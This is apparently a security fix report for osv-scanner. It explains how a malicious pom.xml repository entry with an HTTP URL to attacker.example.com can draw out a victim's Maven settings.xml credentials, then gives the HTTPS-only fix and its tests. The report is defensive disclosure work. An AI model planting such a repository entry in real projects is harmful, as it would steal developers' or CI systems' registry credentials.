datasource: reject non-HTTPS Maven registry URLs to prevent credential exfiltration via pom.xml

[djvirus9]

Summary

AddRegistry accepted any URL scheme from pom.xml <repositories> entries
without validation. A malicious pom.xml could specify an HTTP URL pointing
to an attacker-controlled server. When osv-scanner processes the file, it
makes HTTP requests to that registry. If the server responds with HTTP 401,
HTTPAuthentication.Get() sends the victim's ~/.m2/settings.xml
credentials to the attacker in cleartext.

Attack scenario

1. Attacker creates a malicious pom.xml with:

   <repositories>
     <repository>
       <id>central</id>
       <url>http://attacker.example.com/maven</url>
     </repository>
   </repositories>

2. Victim runs osv-scanner against the project (e.g. in CI scanning a PR)
3. osv-scanner calls AddRegistry with the attacker's HTTP URL
4. Attacker's server responds with 401 + WWW-Authenticate
5. osv-scanner sends victim's settings.xml credentials to attacker

Fix

Reject non-HTTPS URLs in AddRegistry for non-loopback hosts. Loopback
addresses (localhost, 127.0.0.1, ::1) are still permitted for local
development and testing.

Test

TestAddRegistry_RejectsInsecureURL verifies that:

• http://external-host → rejected
• http://external-ip → rejected
• https://external-host → allowed
• http://localhost → allowed (tests/local dev)
• http://127.0.0.1 → allowed (tests/local dev)

Related VRP report: #487071284

[1seal]

Opened google/osv-scalibr#1999 with a proposed fix and regression coverage for both the default-registry and added-registry auth paths.